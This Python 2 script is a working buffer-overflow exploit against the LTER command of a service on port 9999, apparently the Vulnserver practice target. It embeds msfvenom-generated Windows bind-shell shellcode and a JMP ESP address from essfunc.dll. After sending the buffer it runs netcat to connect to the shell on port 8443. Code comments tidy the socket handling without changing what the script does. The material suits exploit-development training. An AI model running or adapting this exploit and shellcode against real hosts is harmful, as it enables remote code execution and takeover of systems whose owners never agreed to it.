#!/usr/bin/env python
import socket
import sys
import time
import telnetlib
import os
from struct import pack
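def sendPayload(host, port, payload):
    """Connect to ``host``:``port``, read the service banner, then send ``payload``.

    Args:
        host: target address as a string.
        port: target TCP port as an int.
        payload: the buffer to deliver once the banner has been read (a
            Python 2 ``str`` in this script; ``bytes`` under Python 3).

    Raises:
        SystemExit: status -1 when the connection or the send fails. The
            payload length and the socket error are printed first so a
            size-related failure can be diagnosed from the console.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        # The service talks first: consume the banner before sending.
        data = s.recv(4096)
        print(data)
        # sendall() loops until every byte is written; send() may return
        # after a partial write and silently truncate the buffer.
        s.sendall(payload)
    except socket.error as exc:
        # Only socket failures are handled here. A bare ``except:`` would
        # also swallow KeyboardInterrupt and programming errors.
        print("final length: {length}".format(length=len(payload)))
        print("[-] socket error: {0}".format(exc))
        # The original ``sys.exit-1()`` was a TypeError (sys.exit minus 1,
        # then a call on the result); the intended status is -1.
        sys.exit(-1)
    finally:
        # Close on every path so a failed send does not leak the socket.
        s.close()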
def main():
    """Build the LTER overflow buffer, send it to the target and attach to the bind shell.

    Python 2 only: ``'LTER /.:/' + ... + jmpESP`` concatenates str literals with
    the ``str`` returned by ``pack()``; under Python 3 ``pack()`` returns
    ``bytes`` and that line raises TypeError (the ``print`` statement in
    ``sendPayload`` is Python 2 syntax as well).

    Returns:
        None, so the ``sys.exit(main())`` guard exits with status 0.
    """
    # msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f python -v bindShell -b '\x00' -e x86/alpha_mixed LPORT=8443 BufferRegister=ESP
    # Payload size: 710 bytes
    # Final size of python file: 3816 bytes
    # Generated shellcode, kept verbatim from the msfvenom run above.
    bindShell = ""
    bindShell += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    bindShell += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
    bindShell += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
    bindShell += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
    bindShell += "\x42\x75\x4a\x49\x69\x6c\x7a\x48\x4e\x62\x35\x50"
    bindShell += "\x65\x50\x77\x70\x75\x30\x4b\x39\x7a\x45\x36\x51"
    bindShell += "\x6f\x30\x71\x74\x4e\x6b\x36\x30\x34\x70\x4e\x6b"
    bindShell += "\x31\x42\x36\x6c\x6c\x4b\x43\x62\x47\x64\x6c\x4b"
    bindShell += "\x61\x62\x46\x48\x56\x6f\x6f\x47\x32\x6a\x46\x46"
    bindShell += "\x46\x51\x4b\x4f\x6e\x4c\x77\x4c\x51\x71\x31\x6c"
    bindShell += "\x63\x32\x76\x4c\x65\x70\x6b\x71\x68\x4f\x44\x4d"
    bindShell += "\x33\x31\x38\x47\x58\x62\x58\x72\x66\x32\x62\x77"
    bindShell += "\x4e\x6b\x52\x72\x76\x70\x4c\x4b\x52\x6a\x55\x6c"
    bindShell += "\x6c\x4b\x30\x4c\x72\x31\x73\x48\x58\x63\x43\x78"
    bindShell += "\x45\x51\x78\x51\x36\x31\x4c\x4b\x42\x79\x37\x50"
    bindShell += "\x75\x51\x79\x43\x6c\x4b\x32\x69\x36\x78\x4d\x33"
    bindShell += "\x66\x5a\x63\x79\x4c\x4b\x54\x74\x6c\x4b\x33\x31"
    bindShell += "\x39\x46\x74\x71\x59\x6f\x4c\x6c\x6b\x71\x48\x4f"
    bindShell += "\x36\x6d\x76\x61\x59\x57\x54\x78\x39\x70\x73\x45"
    bindShell += "\x4a\x56\x66\x63\x73\x4d\x58\x78\x47\x4b\x71\x6d"
    bindShell += "\x47\x54\x30\x75\x5a\x44\x43\x68\x6e\x6b\x66\x38"
    bindShell += "\x36\x44\x53\x31\x6a\x73\x65\x36\x4e\x6b\x56\x6c"
    bindShell += "\x30\x4b\x6c\x4b\x43\x68\x65\x4c\x76\x61\x38\x53"
    bindShell += "\x6c\x4b\x34\x44\x6c\x4b\x47\x71\x7a\x70\x4b\x39"
    bindShell += "\x67\x34\x51\x34\x55\x74\x51\x4b\x61\x4b\x75\x31"
    bindShell += "\x61\x49\x42\x7a\x63\x61\x4b\x4f\x6d\x30\x51\x4f"
    bindShell += "\x61\x4f\x61\x4a\x6e\x6b\x75\x42\x58\x6b\x6e\x6d"
    bindShell += "\x73\x6d\x62\x48\x75\x63\x70\x32\x55\x50\x75\x50"
    bindShell += "\x43\x58\x44\x37\x61\x63\x37\x42\x43\x6f\x76\x34"
    bindShell += "\x32\x48\x72\x6c\x61\x67\x76\x46\x76\x67\x4b\x4f"
    bindShell += "\x68\x55\x4e\x58\x7a\x30\x47\x71\x67\x70\x35\x50"
    bindShell += "\x46\x49\x6f\x34\x43\x64\x36\x30\x42\x48\x66\x49"
    bindShell += "\x4b\x30\x50\x6b\x77\x70\x79\x6f\x49\x45\x30\x6a"
    bindShell += "\x77\x78\x62\x79\x36\x30\x68\x62\x59\x6d\x71\x50"
    bindShell += "\x52\x70\x73\x70\x76\x30\x53\x58\x79\x7a\x46\x6f"
    bindShell += "\x49\x4f\x49\x70\x69\x6f\x4e\x35\x6e\x77\x32\x48"
    bindShell += "\x55\x52\x45\x50\x65\x70\x49\x6b\x4f\x79\x59\x76"
    bindShell += "\x61\x7a\x62\x30\x71\x46\x50\x57\x50\x68\x4a\x62"
    bindShell += "\x6b\x6b\x35\x67\x33\x57\x39\x6f\x38\x55\x72\x77"
    bindShell += "\x50\x68\x58\x37\x49\x79\x77\x48\x39\x6f\x6b\x4f"
    bindShell += "\x7a\x75\x73\x67\x71\x78\x70\x74\x5a\x4c\x45\x6b"
    bindShell += "\x79\x71\x39\x6f\x58\x55\x52\x77\x4c\x57\x73\x58"
    bindShell += "\x30\x75\x50\x6e\x50\x4d\x30\x61\x6b\x4f\x6e\x35"
    bindShell += "\x73\x58\x63\x53\x70\x6d\x62\x44\x37\x70\x6e\x69"
    bindShell += "\x49\x73\x70\x57\x70\x57\x53\x67\x56\x51\x5a\x56"
    bindShell += "\x62\x4a\x75\x42\x63\x69\x52\x76\x58\x62\x4b\x4d"
    bindShell += "\x51\x76\x4b\x77\x57\x34\x34\x64\x75\x6c\x66\x61"
    bindShell += "\x43\x31\x4e\x6d\x30\x44\x67\x54\x72\x30\x6a\x66"
    bindShell += "\x37\x70\x52\x64\x73\x64\x32\x70\x71\x46\x61\x46"
    bindShell += "\x43\x66\x42\x66\x70\x56\x62\x6e\x32\x76\x51\x46"
    bindShell += "\x52\x73\x70\x56\x45\x38\x54\x39\x38\x4c\x55\x6f"
    bindShell += "\x4c\x46\x4b\x4f\x5a\x75\x4e\x69\x39\x70\x52\x6e"
    bindShell += "\x66\x36\x50\x46\x59\x6f\x64\x70\x50\x68\x73\x38"
    bindShell += "\x6b\x37\x55\x4d\x33\x50\x4b\x4f\x4b\x65\x6d\x6b"
    bindShell += "\x38\x70\x4e\x55\x6c\x62\x42\x76\x70\x68\x59\x36"
    bindShell += "\x6a\x35\x6d\x6d\x4d\x4d\x69\x6f\x7a\x75\x77\x4c"
    bindShell += "\x55\x56\x71\x6c\x37\x7a\x4d\x50\x4b\x4b\x4d\x30"
    bindShell += "\x42\x55\x63\x35\x6f\x4b\x37\x37\x32\x33\x50\x72"
    bindShell += "\x50\x6f\x42\x4a\x73\x30\x31\x43\x49\x6f\x5a\x75"
    bindShell += "\x41\x41"
    # Target Host
    # Hardcoded to loopback: the script only ever talks to a local instance.
    host = '127.0.0.1'
    port = 9999
    # Bind Shell
    # Must match LPORT in the msfvenom command above.
    bport = 8443
    # JMP ESP in essfunc.dll
    # pack('<i', ...) renders the address as 4 little-endian bytes (a Python 2 str).
    jmpESP = pack('<i', 0x62501203)
    # Layout after the 9-byte 'LTER /.:/' prefix: 2003 'A's, the 4-byte
    # jmpESP, the shellcode, then 'B' padding sized so the bytes after the
    # prefix always total 3000 regardless of the shellcode length.
    payload = 'LTER /.:/' + 'A' * 2003 + jmpESP + bindShell + 'B' * (3000 - 2003 - 4 - len(bindShell))
    print('Total payload length: {0}'.format(len(payload)))
    print('\r\n\r\n[+] Sending payload')
    sendPayload(host, port, payload)
    print('[+] Connecting to bind shell')
    # Brief pause before nc connects to bport.
    time.sleep(1)
    # NOTE(review): a shell command string built with str.format. This is
    # only acceptable because host and bport are literals defined above; if
    # either ever comes from user input, switch to subprocess with an
    # argument list (shell=False) so no shell metacharacters are interpreted.
    os.system('nc {0} {1}'.format(host, bport))
    print('[+] Connection closed.')
if __name__ == "__main__":
    # Only run when executed as a script; importing the module defines the
    # functions without sending anything. main() returns None, so the
    # process exits with status 0 (SystemExit is what sys.exit() raises).
    raise SystemExit(main())